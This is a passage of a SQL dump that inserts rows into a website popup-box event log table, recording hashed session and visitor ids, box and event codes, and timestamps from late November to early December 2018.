(33227, 'c17d4eed018cbf399c6a76f8122fa81f', '2bbdfd3cb09c259d', 0, 2, 1, '2018-11-29 02:10:49'),
(33228, '6b42402894a7bf078364b471a5b81e18', '0578c84ec3c84505', 0, 2, 1, '2018-11-29 02:46:35'),
(33229, '239b3e42935584c697b7219d43e17a36', 'a069ea4ff5da9a25', 0, 2, 1, '2018-11-29 03:19:38'),
(33230, '5b2183e094bf56ddbd054dadc1752701', '2bc720e7ec99313b', 0, 2, 1, '2018-11-29 03:19:41'),
(33231, '7cec522f5b4d78b92f9295662bf55ac9', 'abe6c8ead564b456', 0, 2, 1, '2018-11-29 03:28:20'),
(33232, '955492b475422dacb43899cc2c276ede', '8bca75940e42f2f5', 0, 2, 1, '2018-11-29 03:37:41'),
(33233, '2144b119d2aec6083a7cffd2cd27d0fb', '187e938df3fe2dc1', 0, 2, 1, '2018-11-29 04:18:48'),
(33234, 'af9db42445db323a7da2057b24b65de2', '5717f6347b85583c', 0, 2, 1, '2018-11-29 04:19:36'),
(33235, '1a0c56d395d0967c7bbc720caaad7daa', '428ecf5ce39a1eb6', 0, 2, 1, '2018-11-29 04:56:35'),
(33236, '038a74580bb6d8b25049afb8ba6ea4b2', '084a318574f9915b', 0, 2, 1, '2018-11-29 05:36:27'),
(33237, '8c0192918c59bcaff022bb1aa487ff03', 'f10990f26adcd1c5', 0, 2, 1, '2018-11-29 05:54:15'),
(33238, 'df89046289b69be46129288d3fa99ce8', '8b98fb89655e190b', 0, 2, 1, '2018-11-29 06:34:26'),
(33239, 'df89046289b69be46129288d3fa99ce8', '8b98fb89655e190b', 0, 2, 1, '2018-11-29 06:34:42'),
(33240, '6604a1b60a7eb7c99b520275ee91c33d', '3dfc95eaaf2e1fad', 0, 2, 1, '2018-11-29 06:35:30'),
(33241, '50851cb9e001054bda0f0ede0af9eef9', 'fe961668877fa513', 0, 2, 1, '2018-11-29 06:48:42'),
(33242, 'cd3233ab8f7feafcb5b4a8ba77ae423b', 'f10990f26adcd1c5', 0, 2, 1, '2018-11-29 07:09:34'),
(33243, '8e0be838b81a99d4104d30b2cb6ec4e8', '8ce0b9978c385ccf', 0, 2, 1, '2018-11-29 07:25:24'),
(33244, '8e0be838b81a99d4104d30b2cb6ec4e8', '8ce0b9978c385ccf', 0, 2, 1, '2018-11-29 07:26:37'),
(33245, '8e0be838b81a99d4104d30b2cb6ec4e8', '8ce0b9978c385ccf', 0, 2, 1, '2018-11-29 07:26:37'),
(33246, '8e0be838b81a99d4104d30b2cb6ec4e8', '8ce0b9978c385ccf', 0, 2, 1, '2018-11-29 07:26:46'),
(33247, '8e0be838b81a99d4104d30b2cb6ec4e8', '8ce0b9978c385ccf', 0, 2, 1, '2018-11-29 07:30:45'),
(33248, '16d92b1fa770123913c79f80f23c9f1c', '99297ef146d26ea8', 0, 2, 1, '2018-11-29 07:34:27'),
(33249, '4b9b7d7410ecc8fed77b745d7be1a66e', 'e0d31f0a24a43cd7', 0, 2, 1, '2018-11-29 07:35:59'),
(33250, 'f0adcf79afb85aabd24a35df85e02b0c', 'baa8d16c1a4e5230', 0, 2, 1, '2018-11-29 08:07:40'),
(33251, 'f0adcf79afb85aabd24a35df85e02b0c', 'baa8d16c1a4e5230', 0, 2, 1, '2018-11-29 08:07:48'),
(33252, 'f0adcf79afb85aabd24a35df85e02b0c', 'baa8d16c1a4e5230', 0, 2, 1, '2018-11-29 08:07:57'),
(33253, 'f0adcf79afb85aabd24a35df85e02b0c', 'baa8d16c1a4e5230', 0, 2, 1, '2018-11-29 08:08:01'),
(33254, 'f0adcf79afb85aabd24a35df85e02b0c', 'baa8d16c1a4e5230', 0, 2, 1, '2018-11-29 08:08:08'),
(33255, 'f0adcf79afb85aabd24a35df85e02b0c', 'baa8d16c1a4e5230', 0, 2, 1, '2018-11-29 08:08:14'),
(33256, 'f0adcf79afb85aabd24a35df85e02b0c', 'baa8d16c1a4e5230', 0, 2, 1, '2018-11-29 08:08:27'),
(33257, 'f0adcf79afb85aabd24a35df85e02b0c', 'baa8d16c1a4e5230', 0, 2, 1, '2018-11-29 08:08:41'),
(33258, 'd1c2669b11df0735fdbb6821d20c0ce2', '105ab72e174ced3e', 0, 2, 1, '2018-11-29 08:14:03'),
(33259, 'd1c2669b11df0735fdbb6821d20c0ce2', '105ab72e174ced3e', 0, 2, 1, '2018-11-29 08:21:17'),
(33260, '7d30543a7a33dd684beab0e82608a641', '89b3674eeb538dd9', 0, 2, 1, '2018-11-29 08:21:18'),
(33261, 'd1c2669b11df0735fdbb6821d20c0ce2', '105ab72e174ced3e', 0, 2, 1, '2018-11-29 08:24:23'),
(33262, 'd1c2669b11df0735fdbb6821d20c0ce2', '105ab72e174ced3e', 0, 2, 1, '2018-11-29 08:25:18'),
(33263, '1675218c4a9288cc332565fc6b3c5c16', '27a4a47d6f89857b', 0, 2, 1, '2018-11-29 08:25:57'),
(33264, 'd1c2669b11df0735fdbb6821d20c0ce2', '105ab72e174ced3e', 0, 2, 1, '2018-11-29 08:26:44'),
(33265, 'd1c2669b11df0735fdbb6821d20c0ce2', '105ab72e174ced3e', 0, 2, 1, '2018-11-29 08:27:13'),
(33266, 'd1c2669b11df0735fdbb6821d20c0ce2', '105ab72e174ced3e', 0, 2, 1, '2018-11-29 08:27:32'),
(33267, 'd1c2669b11df0735fdbb6821d20c0ce2', '105ab72e174ced3e', 0, 2, 1, '2018-11-29 08:28:14'),
(33268, 'd1c2669b11df0735fdbb6821d20c0ce2', '105ab72e174ced3e', 0, 2, 1, '2018-11-29 08:28:22'),
(33269, '14c0cfadee6bdc7f419ee35266518f49', '05d661a77a8cd295', 0, 2, 1, '2018-11-29 09:01:47'),
(33270, 'b931b7ffa4832868df1292a072cbda82', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-11-29 10:47:32'),
(33271, '28ebfdcb090bfd3619313b0469d473e4', '94d13561d625a0d6', 0, 2, 1, '2018-11-29 11:24:42'),
(33272, '910905f5f29d2c0c17e9cfb49a08b2e6', '5c67a14ebb1fe0a4', 0, 2, 1, '2018-11-29 13:30:58'),
(33273, '1c9d573556630c5cbc2c1e08d64e5ec5', 'f0071b4747194c7a', 0, 2, 1, '2018-11-29 13:34:43'),
(33274, 'd93c8a093e77bf36f20ea7288048e966', '105ab72e174ced3e', 0, 2, 1, '2018-11-29 13:43:22'),
(33275, 'd93c8a093e77bf36f20ea7288048e966', '105ab72e174ced3e', 0, 2, 1, '2018-11-29 13:44:04'),
(33276, 'd93c8a093e77bf36f20ea7288048e966', '105ab72e174ced3e', 0, 2, 1, '2018-11-29 13:44:54'),
(33277, 'd93c8a093e77bf36f20ea7288048e966', '105ab72e174ced3e', 0, 2, 1, '2018-11-29 13:45:02'),
(33278, 'd93c8a093e77bf36f20ea7288048e966', '105ab72e174ced3e', 0, 2, 1, '2018-11-29 13:47:21'),
(33279, '01d8ec77a233b0de84f87b775079dc42', 'eb0077c74d8fce0d', 0, 2, 1, '2018-11-29 14:38:12'),
(33280, '8fd059df7b1f759c0cbf2c004906edcc', 'a0489f0b29caa1d4', 0, 2, 1, '2018-11-29 14:43:11'),
(33281, '281b67e3d7af1974ba9ea9f609586afb', '8713d78234b60d5f', 0, 2, 1, '2018-11-29 15:28:02'),
(33282, '281b67e3d7af1974ba9ea9f609586afb', '8713d78234b60d5f', 0, 2, 1, '2018-11-29 15:28:57'),
(33283, '281b67e3d7af1974ba9ea9f609586afb', '8713d78234b60d5f', 0, 2, 1, '2018-11-29 15:29:01'),
(33284, '281b67e3d7af1974ba9ea9f609586afb', '8713d78234b60d5f', 0, 2, 1, '2018-11-29 15:29:29'),
(33285, '281b67e3d7af1974ba9ea9f609586afb', '8713d78234b60d5f', 0, 2, 1, '2018-11-29 15:29:42'),
(33286, '281b67e3d7af1974ba9ea9f609586afb', '8713d78234b60d5f', 0, 2, 1, '2018-11-29 15:30:02'),
(33287, '281b67e3d7af1974ba9ea9f609586afb', '8713d78234b60d5f', 0, 2, 1, '2018-11-29 15:30:19'),
(33288, 'e936cd1478dd3c89cab8f9ded4f96f07', 'a13b8d6d43c3dce9', 0, 2, 1, '2018-11-29 15:37:48'),
(33289, 'e936cd1478dd3c89cab8f9ded4f96f07', 'a13b8d6d43c3dce9', 0, 2, 1, '2018-11-29 15:38:47'),
(33290, '4f3ed7060950bf6eb96e567f36b11b93', '6c6ffedc658d8412', 0, 2, 1, '2018-11-29 16:36:19'),
(33291, '4f3ed7060950bf6eb96e567f36b11b93', '6c6ffedc658d8412', 0, 2, 1, '2018-11-29 16:37:45'),
(33292, '7fb8edf83ac84b83a2f64edac9f71d23', 'c21fac188b7b7855', 0, 2, 1, '2018-11-29 17:03:27'),
(33293, 'ee0f3c5bec8996f8e91cfd614f318a89', 'b3030e34c142dca1', 0, 2, 1, '2018-11-29 17:28:42'),
(33294, '02d21de4e0eda0c9a72d93e4bd18ed10', '1cc364e07c1e7fcd', 0, 2, 1, '2018-11-29 17:36:25'),
(33295, '02d21de4e0eda0c9a72d93e4bd18ed10', '1cc364e07c1e7fcd', 0, 2, 1, '2018-11-29 17:38:31'),
(33296, '48786497d0778302351d1ae84389546e', '7e714a7728d0f296', 0, 2, 1, '2018-11-29 18:14:17'),
(33297, 'c0c311cc95ad67b190b367218eb02fb1', 'f510922c19ff1209', 0, 2, 1, '2018-11-29 18:16:51'),
(33298, 'd373a996c6311cccdfc76cc1bdba6c73', 'c21b863ecdd30da4', 0, 2, 1, '2018-11-29 18:23:24'),
(33299, 'f7400359f1a1cfabe1d6c2f08b781059', '802a9617fc739105', 0, 2, 1, '2018-11-29 21:08:57'),
(33300, '5a15a5f3d0776b435d6b4d6ada4745e8', 'e6465b5dc55a7180', 0, 2, 1, '2018-11-29 21:33:01'),
(33301, 'b397d533caca2168b4ff74362951ae9c', '1848c6e1a8295b98', 0, 2, 1, '2018-11-29 21:33:22'),
(33302, '968e2785e5735e1c844d463df46499f8', '663cb95ec40b6960', 0, 2, 1, '2018-11-29 22:22:06');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(33303, '4dc9970696212124512623631782afe8', '9caaf0de2abdb857', 0, 2, 1, '2018-11-29 22:36:45'),
(33304, '9c50e00170dd35261b54872f3303ca3d', '4a9bbb053e611d1d', 0, 2, 1, '2018-11-29 22:42:11'),
(33305, '973aa4e91dd3ee9190c77e52c0aa2846', '0e87c7c3eefde26d', 0, 2, 1, '2018-11-29 23:45:15'),
(33306, 'ad37a5671232153a957c6cba838c81c7', 'cde6976f351481bb', 0, 2, 1, '2018-11-29 23:45:33'),
(33307, '3da89eab5583c4a9d5f4b0104f75760b', 'b2bb463f13fbd53f', 0, 2, 1, '2018-11-30 00:42:13'),
(33308, 'af245eb12d1328da6296debeb6f2f03b', '593fb522d3d3e052', 0, 2, 1, '2018-11-30 00:51:15'),
(33309, 'a3044fb1066f06222f89cd1c78740b5b', 'fb0188099c74fb63', 0, 2, 1, '2018-11-30 02:23:27'),
(33310, 'fe6eb9583b2d629338b703b2a1a5d937', 'b7b1b37a4f2190f5', 0, 2, 1, '2018-11-30 03:07:23'),
(33311, '38417faa4fdec9e89b0d3944c08aeb51', 'afbf4b02f6e100b7', 0, 2, 1, '2018-11-30 03:07:26'),
(33312, 'd042c4aed308798a3a08a34b5e25ad5b', 'bc279d8132723b44', 0, 2, 1, '2018-11-30 05:03:28'),
(33313, 'f874e0566ca366b3355493402c86c508', 'fe961668877fa513', 0, 2, 1, '2018-11-30 05:32:18'),
(33314, 'c6e2377808d3c9d80d438b94b7282f27', 'e85ac52ec3eecef3', 0, 2, 1, '2018-11-30 05:32:35'),
(33315, '6f9265a6f28a907560bd502598517428', '6d3c7725649cbff2', 0, 2, 1, '2018-11-30 05:41:10'),
(33316, 'ed14af4d605af8da5d539d491765f4ed', 'ff7d01bfa8c3fe1e', 0, 2, 1, '2018-11-30 05:47:16'),
(33317, '849e5c25716ca312b03fd19026cfb94b', '3bcc79252be165b8', 0, 2, 1, '2018-11-30 06:41:40'),
(33318, 'dc554095bcbd1dede6e7323f53979e30', 'c8e26834f5d589f3', 0, 2, 1, '2018-11-30 06:59:59'),
(33319, 'dc554095bcbd1dede6e7323f53979e30', 'c8e26834f5d589f3', 0, 2, 1, '2018-11-30 07:00:12'),
(33320, '897888ecc4e1d56658c8b0e102d05fb7', '815b8c0310370c71', 0, 2, 1, '2018-11-30 07:25:10'),
(33321, '897888ecc4e1d56658c8b0e102d05fb7', '815b8c0310370c71', 0, 2, 1, '2018-11-30 07:27:30'),
(33322, '7fe6ea1e4564e291bc90a2fe3bd45f5d', 'bf09d55923a8ed31', 0, 2, 1, '2018-11-30 08:04:10'),
(33323, '2db1ed55442ac768ac7454fbb58ad2ba', '82f5405156840f64', 0, 2, 1, '2018-11-30 08:05:19'),
(33324, 'c5e86ca2ad3165c32732da679d96d6f4', '94214ce339cf293d', 0, 2, 1, '2018-11-30 09:10:56'),
(33325, '2b4f9fa51ac1af7c36bb9186b54628f6', 'a2b92167f54c9dc2', 0, 2, 1, '2018-11-30 09:16:25'),
(33326, '2b4f9fa51ac1af7c36bb9186b54628f6', 'a2b92167f54c9dc2', 0, 2, 1, '2018-11-30 09:16:37'),
(33327, '2b4f9fa51ac1af7c36bb9186b54628f6', 'a2b92167f54c9dc2', 0, 2, 1, '2018-11-30 09:16:44'),
(33328, '2b4f9fa51ac1af7c36bb9186b54628f6', 'a2b92167f54c9dc2', 0, 2, 1, '2018-11-30 09:16:50'),
(33329, '2b4f9fa51ac1af7c36bb9186b54628f6', 'a2b92167f54c9dc2', 0, 2, 1, '2018-11-30 09:16:57'),
(33330, '2b4f9fa51ac1af7c36bb9186b54628f6', 'a2b92167f54c9dc2', 0, 2, 1, '2018-11-30 10:13:41'),
(33331, '7d626785cb6e2bee067b6a12bd1c37e8', '4574603cf07e6399', 0, 2, 1, '2018-11-30 10:17:35'),
(33332, '6d080763b24b6d4d649edce64aa157ac', '4574603cf07e6399', 0, 2, 1, '2018-11-30 10:23:15'),
(33333, '6d080763b24b6d4d649edce64aa157ac', '4574603cf07e6399', 0, 2, 1, '2018-11-30 10:23:26'),
(33334, '6d080763b24b6d4d649edce64aa157ac', '4574603cf07e6399', 0, 2, 1, '2018-11-30 10:30:15'),
(33335, '5ec077d9b2c4928eaed0a26c8b71aa19', '5a2221202d208995', 0, 2, 1, '2018-11-30 11:51:50'),
(33336, '311abb0c8c11fb88a395cfa3235eea6e', '1ed1872f69d21a43', 0, 2, 1, '2018-11-30 12:18:11'),
(33337, 'd2ec83e8ad7cd7ab2fcdc779dca7b9e5', '51df446c19685386', 0, 2, 1, '2018-11-30 12:45:01'),
(33338, '881be3e5a68c2cc54ee7470973242544', 'ed71d5cd1af1d240', 0, 2, 1, '2018-11-30 13:28:21'),
(33339, '002fbd1f16d0f62769dc4d9963c37c85', 'd01b9e11eced684f', 0, 2, 1, '2018-11-30 13:32:38'),
(33340, '3a41fb9c6c1e7f9435ffa9a80f528fa7', '31a10d5cea999ba2', 0, 2, 1, '2018-11-30 13:33:03'),
(33341, '3813179a0cc6267c004225caa2bc7115', 'e4d280664194bdea', 0, 2, 1, '2018-11-30 13:57:54'),
(33342, '3813179a0cc6267c004225caa2bc7115', 'e4d280664194bdea', 0, 2, 1, '2018-11-30 13:58:39'),
(33343, 'cbdd996c40c1931e410037531dc57914', '026c4a13df3252fb', 0, 2, 1, '2018-11-30 14:31:00'),
(33344, '60238705ada5a0b9d71c2705b611c6a5', 'c8a5d1aef4fef624', 0, 2, 1, '2018-11-30 15:13:35'),
(33345, '1615a316ba1778c71191c565b0c1cc9a', '15ec6ae5a6880a33', 0, 2, 1, '2018-11-30 15:17:12'),
(33346, '92f88489956684201584f72162c79385', '59df05a6d9cb469b', 0, 2, 1, '2018-11-30 15:19:38'),
(33347, '6e4dff724c3f0d25a5cbdd678228b8c1', '575b738595cdb2f5', 0, 2, 1, '2018-11-30 15:40:34'),
(33348, '6e4dff724c3f0d25a5cbdd678228b8c1', '575b738595cdb2f5', 0, 2, 1, '2018-11-30 15:41:04'),
(33349, 'ce717b77edb5e5d5b495876e1ab2fc06', 'f0dc8190bb5378f0', 0, 2, 1, '2018-11-30 15:42:06'),
(33350, 'a27ff3aa620c67d5ef3d9fa25e3f657d', 'c7d4ce8b0de12339', 0, 2, 1, '2018-11-30 15:42:46'),
(33351, 'a27ff3aa620c67d5ef3d9fa25e3f657d', 'c7d4ce8b0de12339', 0, 2, 1, '2018-11-30 15:43:32'),
(33352, '6e4dff724c3f0d25a5cbdd678228b8c1', '575b738595cdb2f5', 0, 2, 1, '2018-11-30 15:45:10'),
(33353, 'f04917a226a9617a923ca5922905a14a', '8cf1f4b8bd4cc593', 0, 2, 1, '2018-11-30 15:47:40'),
(33354, 'f04917a226a9617a923ca5922905a14a', '8cf1f4b8bd4cc593', 0, 2, 1, '2018-11-30 15:48:17'),
(33355, 'f04917a226a9617a923ca5922905a14a', '8cf1f4b8bd4cc593', 0, 2, 1, '2018-11-30 15:48:47'),
(33356, '433628c60efcc708b5ca6ba6dbd885f8', '609d2ec878bc8716', 0, 2, 1, '2018-11-30 16:07:45'),
(33357, 'ab1ef4ae3bd3e724f904209d14d3ac4a', '9653e56526c63ff9', 0, 2, 1, '2018-11-30 16:07:46'),
(33358, '1e6dbc0d2a1db1e027eb51cf2f3700f6', 'a74e855d9edcd019', 0, 2, 1, '2018-11-30 16:08:23'),
(33359, '1e6dbc0d2a1db1e027eb51cf2f3700f6', 'a74e855d9edcd019', 0, 2, 1, '2018-11-30 16:09:03'),
(33360, '00dc5b237dbd1ff36d24642f6df05ef2', '10d9000ca676314c', 0, 2, 1, '2018-11-30 16:10:41'),
(33361, '00dc5b237dbd1ff36d24642f6df05ef2', '10d9000ca676314c', 0, 2, 1, '2018-11-30 16:11:13'),
(33362, '45bb91d34b3c0ecf22d4b5f6f0fcbc77', 'c1afa73671a6ae95', 0, 2, 1, '2018-11-30 16:11:26'),
(33363, '00dc5b237dbd1ff36d24642f6df05ef2', '10d9000ca676314c', 0, 2, 1, '2018-11-30 16:11:26'),
(33364, '00dc5b237dbd1ff36d24642f6df05ef2', '10d9000ca676314c', 0, 2, 1, '2018-11-30 16:11:42'),
(33365, '45bb91d34b3c0ecf22d4b5f6f0fcbc77', 'c1afa73671a6ae95', 0, 2, 1, '2018-11-30 16:11:48'),
(33366, '45bb91d34b3c0ecf22d4b5f6f0fcbc77', 'c1afa73671a6ae95', 0, 2, 1, '2018-11-30 16:12:10'),
(33367, '45bb91d34b3c0ecf22d4b5f6f0fcbc77', 'c1afa73671a6ae95', 0, 2, 1, '2018-11-30 16:13:02'),
(33368, '45bb91d34b3c0ecf22d4b5f6f0fcbc77', 'c1afa73671a6ae95', 0, 2, 1, '2018-11-30 16:13:38'),
(33369, '45bb91d34b3c0ecf22d4b5f6f0fcbc77', 'c1afa73671a6ae95', 0, 2, 1, '2018-11-30 16:13:57'),
(33370, '00dc5b237dbd1ff36d24642f6df05ef2', '10d9000ca676314c', 0, 2, 1, '2018-11-30 16:14:10'),
(33371, '45bb91d34b3c0ecf22d4b5f6f0fcbc77', 'c1afa73671a6ae95', 0, 2, 1, '2018-11-30 16:14:22'),
(33372, '00dc5b237dbd1ff36d24642f6df05ef2', '10d9000ca676314c', 0, 2, 1, '2018-11-30 16:14:50'),
(33373, 'c2a3df9013b7fd92a39409881716254e', '16babeec09e57445', 0, 2, 1, '2018-11-30 16:15:47'),
(33374, '230c029b3859b9e41732d34ac8ab1631', 'e927fe1792483396', 0, 2, 1, '2018-11-30 16:24:21'),
(33375, '230c029b3859b9e41732d34ac8ab1631', 'e927fe1792483396', 0, 2, 1, '2018-11-30 16:24:36'),
(33376, '813cb19ace8ae1650eb95c257c14136d', '196ae7616c94df27', 0, 2, 1, '2018-11-30 16:32:30'),
(33377, '813cb19ace8ae1650eb95c257c14136d', '196ae7616c94df27', 0, 2, 1, '2018-11-30 16:33:17'),
(33378, '813cb19ace8ae1650eb95c257c14136d', '196ae7616c94df27', 0, 2, 1, '2018-11-30 16:39:08'),
(33379, '813cb19ace8ae1650eb95c257c14136d', '196ae7616c94df27', 0, 2, 1, '2018-11-30 16:39:20'),
(33380, '922daebe04216136e725220a82c6ca2f', '3813ed9ace9bc8eb', 0, 2, 1, '2018-11-30 16:49:55'),
(33381, '50533c22144e6e3a60288d872903c59b', '863b661787591b2d', 0, 2, 1, '2018-11-30 17:24:30'),
(33382, '01bbcb308c4c844e915ada49d9773aef', 'b8c7542fe3150a11', 0, 2, 1, '2018-11-30 17:28:06'),
(33383, '192680c9305f6a92a018984ad5608400', '3ba3484de462963c', 0, 2, 1, '2018-11-30 17:38:46'),
(33384, '9695d9d5b1aecd6e242e0cd2ada525b6', 'c7d4ce8b0de12339', 0, 2, 1, '2018-11-30 17:41:47'),
(33385, '9695d9d5b1aecd6e242e0cd2ada525b6', 'c7d4ce8b0de12339', 0, 2, 1, '2018-11-30 17:42:15'),
(33386, '9c3f0fe9e0a74b804bd4b3bce687a142', '504114a9aa6b6f6e', 0, 2, 1, '2018-11-30 17:43:06'),
(33387, 'b397a20f83995ed704f460ad16e83309', '64b21d506bd9d336', 0, 2, 1, '2018-11-30 17:50:42'),
(33388, 'b397a20f83995ed704f460ad16e83309', '64b21d506bd9d336', 0, 2, 1, '2018-11-30 17:51:05'),
(33389, 'ecf2889822278c60e2cfa918e2e97fcf', '196ae7616c94df27', 0, 2, 1, '2018-11-30 17:54:02'),
(33390, 'ecf2889822278c60e2cfa918e2e97fcf', '196ae7616c94df27', 0, 2, 1, '2018-11-30 17:54:23'),
(33391, 'c5235c7b1f0c62cb814ba71e2b2e04d0', 'bf359cadd1852841', 0, 2, 1, '2018-11-30 18:22:57'),
(33392, 'b13397a405c6147462b83dc955f964fe', 'ced271aa7bd8f2a9', 0, 2, 1, '2018-11-30 18:30:39'),
(33393, '9e59ba5fcc23f7384d425d7c6e9a8946', 'b9974a919762d897', 0, 2, 1, '2018-11-30 18:31:29'),
(33394, '9e59ba5fcc23f7384d425d7c6e9a8946', 'b9974a919762d897', 0, 2, 1, '2018-11-30 18:32:12'),
(33395, '1e6dbc0d2a1db1e027eb51cf2f3700f6', 'a74e855d9edcd019', 0, 2, 1, '2018-11-30 18:32:41'),
(33396, 'e42ae4f49ee805de5ccae33534627940', '1615e4952db0c59e', 0, 2, 1, '2018-11-30 20:06:23'),
(33397, '489c13a961f77b64ffcd34cbd8cfdc58', 'd40300dc5b83c344', 0, 2, 1, '2018-11-30 20:31:27'),
(33398, '489c13a961f77b64ffcd34cbd8cfdc58', 'd40300dc5b83c344', 0, 2, 1, '2018-11-30 20:35:46'),
(33399, '25ca7905f28774a42e03bf1f98ab197c', 'c3e0087f8ab9e33e', 0, 2, 1, '2018-11-30 21:08:42'),
(33400, '25ca7905f28774a42e03bf1f98ab197c', 'c3e0087f8ab9e33e', 0, 2, 1, '2018-11-30 21:09:22'),
(33401, '85a87e81d64ef7cf9b2947f9bbc05f86', '885d9f97d4a706fb', 0, 2, 1, '2018-11-30 21:47:19'),
(33402, 'c98a6754de6d0ded3d824f6162dc644f', '4eb7063123b92e2c', 0, 2, 1, '2018-11-30 21:51:51'),
(33403, 'f09ba0fa55fec75edec0e75f74c549e4', 'f83ecb17cb9f26ea', 0, 2, 1, '2018-11-30 21:58:36'),
(33404, 'ff92f74bef138cc5167b2f53d0279ae3', '41c4f19681a7b34c', 0, 2, 1, '2018-11-30 22:07:35'),
(33405, '45bb91d34b3c0ecf22d4b5f6f0fcbc77', 'c1afa73671a6ae95', 0, 2, 1, '2018-11-30 22:15:14'),
(33406, '6cdf5454c35d25b08c923c0d01e1beae', '4a4f9617c62d6d77', 0, 2, 1, '2018-11-30 22:24:50'),
(33407, 'bc4720092597445c2ce4ad86119d67f1', '73ac4359d8a4add9', 0, 2, 1, '2018-11-30 22:25:10'),
(33408, 'fb37e9d5fb8d5aac6c734b35f909b646', '5ce557a8e483a113', 0, 2, 1, '2018-11-30 23:31:54'),
(33409, 'fb37e9d5fb8d5aac6c734b35f909b646', '5ce557a8e483a113', 0, 2, 1, '2018-11-30 23:32:00'),
(33410, '814e97191a849ecbffd0b680c0dadf03', '6bbff7b80725cfe8', 0, 2, 1, '2018-11-30 23:40:04'),
(33411, '35e6b3e7651254fc55bf305d1911e3f7', '7d259ac76c3411f4', 0, 2, 1, '2018-11-30 23:40:40'),
(33412, '1c6900029461af2d660d4d8bb87143de', 'bbc9866411ee9a1c', 0, 2, 1, '2018-12-01 00:13:52'),
(33413, 'ef4914c9598db226fd2dc1ec62c55516', '62d8b258693b932c', 0, 2, 1, '2018-12-01 01:35:14'),
(33414, 'f46b68ce0b6d80db053b0a1676f07c8c', '18607e8879f51736', 0, 2, 1, '2018-12-01 01:47:11'),
(33415, '9d52fb99063563aece14f55b7e0389dd', 'c5fc921e581d1872', 0, 2, 1, '2018-12-01 01:47:15'),
(33416, '017e387f053dc8ee0ef2a50b5362e6c9', '609be6cc5e62cc24', 0, 2, 1, '2018-12-01 02:20:24'),
(33417, 'd0f58e92b2815b84734a095d7b790043', 'abce648d9f5ff418', 0, 2, 1, '2018-12-01 02:29:08'),
(33418, '9a68e4c591532b4ccdb67ab6c655bdf3', '687988673413ca41', 0, 2, 1, '2018-12-01 02:34:37'),
(33419, 'f2f4c0aff235c283865cf88f78cf79d0', 'cd70e6747ee04d15', 0, 2, 1, '2018-12-01 03:03:02'),
(33420, '59fd94a8e1f9e6ecd383fccf111c9fb3', '9d7e91466402b84a', 0, 2, 1, '2018-12-01 03:09:59'),
(33421, '511c056f54049c9b0381501a501b1510', '934ff86b11813249', 0, 2, 1, '2018-12-01 04:09:11'),
(33422, '23643af9f7e344f0bc88044739993433', 'f928cd0f8a68bca9', 0, 2, 1, '2018-12-01 04:22:33'),
(33423, 'a3316fae0a617f18910e471445d8ab83', '82c9a31dd71593f6', 0, 2, 1, '2018-12-01 04:38:42'),
(33424, 'ce45b46ff4d95f343ebaf9c078728680', '07067edcef00da48', 0, 2, 1, '2018-12-01 04:43:13'),
(33425, 'ce45b46ff4d95f343ebaf9c078728680', '07067edcef00da48', 0, 2, 1, '2018-12-01 04:44:01'),
(33426, 'ce45b46ff4d95f343ebaf9c078728680', '07067edcef00da48', 0, 2, 1, '2018-12-01 04:44:56'),
(33427, 'ce45b46ff4d95f343ebaf9c078728680', '07067edcef00da48', 0, 2, 1, '2018-12-01 04:45:32'),
(33428, 'ce45b46ff4d95f343ebaf9c078728680', '07067edcef00da48', 0, 2, 1, '2018-12-01 04:46:00'),
(33429, 'ce45b46ff4d95f343ebaf9c078728680', '07067edcef00da48', 0, 2, 1, '2018-12-01 04:46:19'),
(33430, 'ce45b46ff4d95f343ebaf9c078728680', '07067edcef00da48', 0, 2, 1, '2018-12-01 04:46:25'),
(33431, 'fd871211503045b0491e597e11d2cec0', '1e527eeb3c6eb633', 0, 2, 1, '2018-12-01 04:57:31'),
(33432, 'c444835cd630b3212f98d34bd3f14393', '8e0589df61cad931', 0, 2, 1, '2018-12-01 05:00:58'),
(33433, 'c444835cd630b3212f98d34bd3f14393', '8e0589df61cad931', 0, 2, 1, '2018-12-01 05:01:18'),
(33434, '1b937fbce9c29d831914f50314e91c6f', 'e3163f1046dc4449', 0, 2, 1, '2018-12-01 05:04:04'),
(33435, '1b937fbce9c29d831914f50314e91c6f', 'e3163f1046dc4449', 0, 2, 1, '2018-12-01 05:04:16'),
(33436, '0d928157b0b9cc4e042006ccc90802f1', 'fbb96575dac72fff', 0, 2, 1, '2018-12-01 05:04:38'),
(33437, 'c444835cd630b3212f98d34bd3f14393', '8e0589df61cad931', 0, 2, 1, '2018-12-01 05:04:40'),
(33438, '0d928157b0b9cc4e042006ccc90802f1', 'fbb96575dac72fff', 0, 2, 1, '2018-12-01 05:04:58'),
(33439, 'be8713cd3bbdd6e9b567306c0e1a2ee1', 'dafea8cf49015d3f', 0, 2, 1, '2018-12-01 05:05:05'),
(33440, '0d928157b0b9cc4e042006ccc90802f1', 'fbb96575dac72fff', 0, 2, 1, '2018-12-01 05:05:21'),
(33441, 'be8713cd3bbdd6e9b567306c0e1a2ee1', 'dafea8cf49015d3f', 0, 2, 1, '2018-12-01 05:05:24'),
(33442, '0d928157b0b9cc4e042006ccc90802f1', 'fbb96575dac72fff', 0, 2, 1, '2018-12-01 05:05:38'),
(33443, 'be8713cd3bbdd6e9b567306c0e1a2ee1', 'dafea8cf49015d3f', 0, 2, 1, '2018-12-01 05:06:23'),
(33444, 'c444835cd630b3212f98d34bd3f14393', '8e0589df61cad931', 0, 2, 1, '2018-12-01 05:06:25'),
(33445, 'c444835cd630b3212f98d34bd3f14393', '8e0589df61cad931', 0, 2, 1, '2018-12-01 05:06:42'),
(33446, '0d928157b0b9cc4e042006ccc90802f1', 'fbb96575dac72fff', 0, 2, 1, '2018-12-01 05:07:02'),
(33447, 'cd1c43e47d0b8a8210076aba68c78f94', 'f57df3b284792c57', 0, 2, 1, '2018-12-01 05:07:04'),
(33448, '0d928157b0b9cc4e042006ccc90802f1', 'fbb96575dac72fff', 0, 2, 1, '2018-12-01 05:07:12'),
(33449, 'cd1c43e47d0b8a8210076aba68c78f94', 'f57df3b284792c57', 0, 2, 1, '2018-12-01 05:07:18'),
(33450, 'c444835cd630b3212f98d34bd3f14393', '8e0589df61cad931', 0, 2, 1, '2018-12-01 05:08:11'),
(33451, '0d928157b0b9cc4e042006ccc90802f1', 'fbb96575dac72fff', 0, 2, 1, '2018-12-01 05:08:15'),
(33452, 'b9a9fa608549b8eb158f444c1a768c06', 'cad202a09758cb3a', 0, 2, 1, '2018-12-01 05:08:16'),
